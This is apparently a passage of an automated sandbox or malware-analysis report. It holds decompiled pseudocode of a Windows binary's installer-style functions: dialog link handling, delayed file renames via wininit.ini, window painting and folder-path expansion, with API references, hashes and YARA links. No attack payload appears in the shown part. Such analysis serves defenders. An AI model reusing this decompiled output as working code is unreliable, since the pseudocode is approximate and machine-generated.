						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















                                                                          0x00403eff
                                                                          0x00404025
                                                                          0x00404081
                                                                          0x00404085
                                                                          0x0040415c
                                                                          0x0040415e
                                                                          0x0040415e
                                                                          0x00404164
                                                                          0x00404164
                                                                          0x00404167
                                                                          0x00000000
                                                                          0x0040416e
                                                                          0x00404093
                                                                          0x00404095
                                                                          0x0040409f
                                                                          0x004040aa
                                                                          0x004040ad
                                                                          0x004040b0
                                                                          0x004040bb
                                                                          0x004040be
                                                                          0x004040c5
                                                                          0x004040d3
                                                                          0x004040eb
                                                                          0x004040fe
                                                                          0x0040410e
                                                                          0x00404110
                                                                          0x00404110
                                                                          0x004040c5
                                                                          0x0040411a
                                                                          0x00000000
                                                                          0x00404125
                                                                          0x00404129
                                                                          0x0040413a
                                                                          0x0040413a
                                                                          0x00404140
                                                                          0x0040414e
                                                                          0x0040414e
                                                                          0x00000000
                                                                          0x00404152
                                                                          0x0040411a
                                                                          0x00404030
                                                                          0x00000000
                                                                          0x00404044
                                                                          0x0040404a
                                                                          0x00404050
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404075
                                                                          0x00404077
                                                                          0x0040407c
                                                                          0x00000000
                                                                          0x0040407c
                                                                          0x00404030
                                                                          0x00403f05
                                                                          0x00403f08
                                                                          0x00403f0d
                                                                          0x00403f1e
                                                                          0x00403f1e
                                                                          0x00403f25
                                                                          0x00403f28
                                                                          0x00403f2a
                                                                          0x00403f2f
                                                                          0x00403f38
                                                                          0x00403f3e
                                                                          0x00403f4a
                                                                          0x00403f4d
                                                                          0x00403f56
                                                                          0x00403f5b
                                                                          0x00403f5e
                                                                          0x00403f63
                                                                          0x00403f7a
                                                                          0x00403f81
                                                                          0x00403f94
                                                                          0x00403f97
                                                                          0x00403fac
                                                                          0x00403fb3
                                                                          0x00403fb8
                                                                          0x00403fbd
                                                                          0x00403fbd
                                                                          0x00403fcc
                                                                          0x00403fdb
                                                                          0x00403fdd
                                                                          0x00403ff3
                                                                          0x00404002
                                                                          0x00404004
                                                                          0x00000000

                                                                          APIs
                                                                          • CheckDlgButton.USER32 ref: 00403F7A
                                                                          • GetDlgItem.USER32 ref: 00403F8E
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                          • GetSysColor.USER32(?), ref: 00403FBD
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                          • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                          • GetDlgItem.USER32 ref: 00404065
                                                                          • SendMessageA.USER32(00000000), ref: 00404068
                                                                          • GetDlgItem.USER32 ref: 00404093
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                          • LoadCursorA.USER32 ref: 004040E2
                                                                          • SetCursor.USER32(00000000), ref: 004040EB
                                                                          • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                          • LoadCursorA.USER32 ref: 0040410B
                                                                          • SetCursor.USER32(00000000), ref: 0040410E
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: N$open
                                                                          • API String ID: 3615053054-904208323
                                                                          • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                          • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                          • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                          • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                                                          0x00405715
                                                                          0x0040571c
                                                                          0x00405720
                                                                          0x00405729
                                                                          0x0040572d
                                                                          0x00405879
                                                                          0x00405879
                                                                          0x00000000
                                                                          0x00405879
                                                                          0x0040572d
                                                                          0x00405739
                                                                          0x0040574f
                                                                          0x00405777
                                                                          0x00405782
                                                                          0x00405786
                                                                          0x004057a9
                                                                          0x004057b1
                                                                          0x004057bd
                                                                          0x004057d4
                                                                          0x004057da
                                                                          0x004057df
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004057ee
                                                                          0x004057f0
                                                                          0x004057fd
                                                                          0x00405801
                                                                          0x00405872
                                                                          0x00405873
                                                                          0x00000000
                                                                          0x0040581d
                                                                          0x0040582a
                                                                          0x0040588f
                                                                          0x00405896
                                                                          0x0040583d
                                                                          0x0040583d
                                                                          0x0040583f
                                                                          0x00405848
                                                                          0x00405853
                                                                          0x00405865
                                                                          0x0040586c
                                                                          0x00000000
                                                                          0x0040586c
                                                                          0x00405898
                                                                          0x0040589e
                                                                          0x004058a0
                                                                          0x004058af
                                                                          0x004058af
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004058a2
                                                                          0x004058a2
                                                                          0x004058a4
                                                                          0x004058a7
                                                                          0x004058ab
                                                                          0x00000000
                                                                          0x004058a2
                                                                          0x00405835
                                                                          0x0040583a
                                                                          0x00000000
                                                                          0x0040583a
                                                                          0x00405801
                                                                          0x00405751
                                                                          0x0040575c
                                                                          0x00405765
                                                                          0x00405769
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405769
                                                                          0x00405883

                                                                          APIs
                                                                            • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                            • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                            • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                          • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                          • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                          • wsprintfA.USER32 ref: 004057A0
                                                                          • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                          • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                          • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                          • GlobalFree.KERNEL32 ref: 0040586C
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                            • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                            • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                          • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                          • API String ID: 3633819597-1342836890
                                                                          • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                          • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                          • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                          • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                          0x0040100a
                                                                          0x00401039
                                                                          0x00401047
                                                                          0x0040104d
                                                                          0x00401051
                                                                          0x0040105b
                                                                          0x00401061
                                                                          0x00401064
                                                                          0x004010f3
                                                                          0x00401089
                                                                          0x0040108c
                                                                          0x004010a6
                                                                          0x004010bd
                                                                          0x004010cc
                                                                          0x004010cf
                                                                          0x004010d5
                                                                          0x004010d9
                                                                          0x004010e4
                                                                          0x004010ed
                                                                          0x004010ef
                                                                          0x004010ef
                                                                          0x00401100
                                                                          0x00401105
                                                                          0x0040110d
                                                                          0x00401110
                                                                          0x00401112
                                                                          0x00401118
                                                                          0x0040111f
                                                                          0x00401126
                                                                          0x00401130
                                                                          0x00401142
                                                                          0x00401156
                                                                          0x00401160
                                                                          0x00401165
                                                                          0x00401165
                                                                          0x00401110
                                                                          0x0040116e
                                                                          0x00000000
                                                                          0x00401178
                                                                          0x00401010
                                                                          0x00401013
                                                                          0x00401015
                                                                          0x0040101f
                                                                          0x0040101f
                                                                          0x00000000

                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32 ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F
                                                                          • API String ID: 941294808-1304234792
                                                                          • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                          • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                          • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                          • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















                                                                          0x004059e8
                                                                          0x004059ef
                                                                          0x00405a00
                                                                          0x00405a00
                                                                          0x00405a0a
                                                                          0x00405a0c
                                                                          0x00405a13
                                                                          0x00405a1b
                                                                          0x00405a21
                                                                          0x00405a24
                                                                          0x00405a24
                                                                          0x00405bd5
                                                                          0x00405bd5
                                                                          0x00405bd9
                                                                          0x00405bdc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405a31
                                                                          0x00405a37
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405a3d
                                                                          0x00405a3e
                                                                          0x00405a41
                                                                          0x00405bc8
                                                                          0x00405bd2
                                                                          0x00405bd4
                                                                          0x00405bd4
                                                                          0x00405bca
                                                                          0x00405bcc
                                                                          0x00405bce
                                                                          0x00405bcf
                                                                          0x00405bcf
                                                                          0x00000000
                                                                          0x00405bc8
                                                                          0x00405a47
                                                                          0x00405a4b
                                                                          0x00405a5b
                                                                          0x00405a62
                                                                          0x00405a65
                                                                          0x00405a68
                                                                          0x00405a6a
                                                                          0x00405a6d
                                                                          0x00405a70
                                                                          0x00405a71
                                                                          0x00405a75
                                                                          0x00405a78
                                                                          0x00405b73
                                                                          0x00405b77
                                                                          0x00405ba7
                                                                          0x00405bab
                                                                          0x00405bb0
                                                                          0x00405bb4
                                                                          0x00405bb4
                                                                          0x00405bb9
                                                                          0x00405bbf
                                                                          0x00405bc1
                                                                          0x00000000
                                                                          0x00405bc1
                                                                          0x00405b79
                                                                          0x00405b7c
                                                                          0x00405b91
                                                                          0x00405b98
                                                                          0x00405b7e
                                                                          0x00405b85
                                                                          0x00405b85
                                                                          0x00405ba0
                                                                          0x00405ba3
                                                                          0x00405b6b
                                                                          0x00405b6c
                                                                          0x00405b6c
                                                                          0x00000000
                                                                          0x00405ba3
                                                                          0x00405a7e
                                                                          0x00405a82
                                                                          0x00405a87
                                                                          0x00405a88
                                                                          0x00405a8b
                                                                          0x00405a96
                                                                          0x00405a99
                                                                          0x00405a9c
                                                                          0x00405ab5
                                                                          0x00405ab8
                                                                          0x00405ae5
                                                                          0x00405ae8
                                                                          0x00405af8
                                                                          0x00405afb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b03
                                                                          0x00000000
                                                                          0x00405b03
